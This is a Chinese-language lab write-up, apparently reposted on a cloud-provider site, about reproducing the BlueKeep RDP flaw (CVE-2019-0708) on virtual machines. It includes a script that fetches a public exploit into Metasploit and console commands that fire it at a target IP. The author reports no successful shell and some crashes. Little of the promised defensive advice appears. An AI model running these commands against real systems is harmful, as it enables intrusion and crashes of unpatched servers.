温馨提示×

温馨提示×

您好,登录后才能下订单哦!

密码登录×
登录注册×
其他方式登录
点击 登录注册 即表示同意《亿速云用户服务条款》

CVE-2019-0708复现和防御手段是什么

发布时间:2021-12-22 21:02:31 来源:亿速云 阅读:187 作者:柒染 栏目:网络管理

CVE-2019-0708复现和防御手段是什么,很多新手对此不是很清楚,为了帮助大家解决这个难题,下面小编将为大家详细讲解,有这方面需求的人可以来学习下,希望你能有所收获。

一、漏洞描述

Windows系列服务器于2019年5月15号,被爆出高危漏洞,该漏洞影响范围较广如:windows2003、windows2008、windows2008 R2、windows xp系统都会遭到攻击,该服务器漏洞利用方式是通过远程桌面端口3389,RDP协议进行攻击的。

二、漏洞利用方法

为了测试方便,直接扔出自编的一个脚本,按下面步骤做就可以,使用kali linxu系统。

1.     建立一个脚本文件*.sh,同时chmod +x *.sh付给它可执行属性

2.     直接复制如下代码到*.sh,然后./*.sh运行即可准备好攻击环境(注意:脚本帮助更新了MSF,这一步是必须的!不然框架加载不进来)

#Update your MSF
apt-get update
apt-get install
metasploit-framework
#Download cve-2019-0708
git clone https://github.com/NAXG/cve_2019_0708_bluekeep_rce.git
#Mkdir for cve
mkdir –p /usr/share/metasploit-framework/lib/msf/core/exploit/
mkdir –p
/usr/share/metasploit-framework/modules/auxiliary/scanner/
mkdir –p
/usr/share/metasploit-framework/modules/exploits/windows/rdp/
mkdir –p
/usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/
#Copy .rb to target dir
cd cve_2019_0708_bluekeep_rce/
cp rdp.rb /usr/share/metasploit-framework/lib/msf/core/exploit/
cp rdp_scanner.rb /usr/share/metasploit-framework/modules/auxiliary/scanner/
cp cve_2019_0708_bluekeep_rce.rb /usr/share/metasploit-framework/modules/exploits/windows/rdp/
cp cve_2019_0708_bluekeep.rb /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/

CVE-2019-0708下载后包含2个模块,一个扫描模块cve_2019_0708_bluekeep,一个攻击模块cve_2019_0708_bluekeep_rce,直接使用攻击模块就可以。

CVE-2019-0708复现和防御手段是什么

3.     继续如下操作即可开始测试

msfconsole

reload_all

use exploit/windows/rdp/cve_2019_0708_bluekeep_rce

set rhosts 192.168.80.111(目标IP)

set target 3(目标环境,具体用哪个看下面第二个图,或者直接在模块下输入info就行)

run

CVE-2019-0708复现和防御手段是什么

CVE-2019-0708复现和防御手段是什么

        三、开始测试(系统都是虚拟机)

       1.       测试winxp-sp3

       可以,XP岿然不动,稳如泰山!虽然没打几个补丁,但是一点都不虚!

CVE-2019-0708复现和防御手段是什么

CVE-2019-0708复现和防御手段是什么

2.       测试win7-x64-sp1

     稳如……难道这就是现实?一点也打不动……

CVE-2019-0708复现和防御手段是什么CVE-2019-0708复现和防御手段是什么

CVE-2019-0708复现和防御手段是什么

3.       测试server2008-x64-R2-SP1

            可以的,不但没有拿到shell,还打蓝屏了,换了一个参数,打成了无响应……

CVE-2019-0708复现和防御手段是什么CVE-2019-0708复现和防御手段是什么CVE-2019-0708复现和防御手段是什么

4.       测试server-2003-企业版

     打不动……好像知道了一点事情……

CVE-2019-0708复现和防御手段是什么

CVE-2019-0708复现和防御手段是什么

5.       测试win10-x64专业版

      当然要拿自己的机器试一下,一样没打补丁,完全打不动。

CVE-2019-0708复现和防御手段是什么CVE-2019-0708复现和防御手段是什么

四、 写在最后

       本次测试虽然没有成功复现,但是折腾之后想起来一个词“水土不服”,曾经折腾过很多渗透测试,都是因为水土不服——只有找到特定的系统,做特定的配置才能复现,有的甚至要配置特定的系统语言。

       其实本次CVE也要在2008R2上配置一些东西才能通过,但是距离真实环境太远,就没去配置,原汁原味测试一下就好啦,还有……渗透测试建议不要用这个,蓝屏谁也受不了!

看完上述内容是否对您有帮助呢?如果还想对相关知识有进一步的了解或阅读更多相关文章,请关注亿速云行业资讯频道,感谢您对亿速云的支持。

向AI问一下细节

免责声明:本站发布的内容(图片、视频和文字)以原创、转载和分享为主,文章观点不代表本网站立场,如果涉及侵权请联系站长邮箱:is@yisu.com进行举报,并提供相关证据,一经查实,将立刻删除涉嫌侵权内容。

AI